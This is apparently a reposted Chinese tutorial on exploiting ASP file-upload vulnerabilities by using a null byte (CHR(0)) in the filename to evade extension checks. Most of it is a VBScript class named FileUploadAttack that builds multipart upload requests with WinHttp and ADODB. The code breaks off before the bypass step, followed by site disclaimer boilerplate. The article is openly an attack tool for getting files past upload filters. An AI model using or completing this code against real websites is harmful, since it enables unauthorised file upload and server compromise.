ASP上传漏洞之利用CHR(0)避开扩展名检测脚本
发布时间:2023-08-01 13:22:17 所属栏目:Asp教程 来源:
导读:今天Demon 提到了这个问题,正好想到之前看到的一篇文章《Automatic file upload using IE+ADO without user interaction - VBSscript》 。这篇文章给出了本地无交互自动上传脚本的示例,正好今天可以借来一用,原脚
|
今天Demon 提到了这个问题,正好想到之前看到的一篇文章《Automatic file upload using IE+ADO without user interaction - VBSscript》 。这篇文章给出了本地无交互自动上传脚本的示例,正好今天可以借来一用,原脚本利用了InternetExplorer.Application组件,我改写了一下,用WinHttp.WinHttpRequest.5.1实现了类似的功能,关于这个组件更多的用法请参考《WinHttpRequest Object Reference》 。 复制代码 代码如下: Option Explicit Function file_get_contents(filename) Dim fso, f Set fso = WSH.CreateObject("Scripting.FilesystemObject") Set f = fso.OpenTextFile(filename, 1) file_get_contents = f.ReadAll f.Close Set f = Nothing Set fso = Nothing End Function ' 代码修改自 http://www.motobit.com/tips/detpg_uploadvbsie/ Class FileUploadAttack Private m_objWinHttp Private m_strUrl Private m_strFieldName Private Sub Class_Initialize() Set m_objWinHttp = WSH.CreateObject( _ "WinHttp.WinHttpRequest.5.1") End Sub Private Sub Class_Terminate() Set m_objWinHttp = Nothing End Sub Public Sub setUrl(url) m_strUrl = url End Sub Public Sub setFieldName(name) m_strFieldName = name End Sub 'Infrormations In form field header. Function mpFields(FieldName, FileName, ContentType) Dim MPTemplate 'template For multipart header MPTemplate = "Content-Disposition: form-data; name=""{field}"";" + _ " filename=""{file}""" + vbCrLf + _ "Content-Type: {ct}" + vbCrLf + vbCrLf Dim Out Out = Replace(MPTemplate, "{field}", FieldName) Out = Replace(Out, "{file}", FileName) mpFields = Replace(Out, "{ct}", ContentType) End Function 'Converts OLE string To multibyte string Function StringToMB(S) Dim I, B For I = 1 To Len(S) B = B & ChrB(Asc(Mid(S, I, 1))) Next StringToMB = B End Function 'Build multipart/form-data document with file contents And header info Function BuildFormData(FileContents, Boundary, _ FileName, FieldName) Dim FormData, Pre, Po Const ContentType = "application/upload" 'The two parts around file contents In the multipart-form data. Pre = "--" + Boundary + vbCrLf + mpFields(FieldName, _ FileName, ContentType) Po = vbCrLf + "--" + Boundary + "--" + vbCrLf 'Build form data using recordset binary field Const adLongVarBinary = 205 Dim RS: Set RS = WSH.CreateObject("ADODB.Recordset") RS.Fields.Append "b", adLongVarBinary, _ Len(Pre) + LenB(FileContents) + Len(Po) RS.Open RS.AddNew Dim LenData 'Convert Pre string value To a binary data LenData = Len(Pre) RS("b").AppendChunk (StringToMB(Pre) & ChrB(0)) Pre = RS("b").GetChunk(LenData) RS("b") = "" 'Convert Po string value To a binary data LenData = Len(Po) RS("b").AppendChunk (StringToMB(Po) & ChrB(0)) Po = RS("b").GetChunk(LenData) RS("b") = "" (编辑:汽车网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
推荐文章
站长推荐
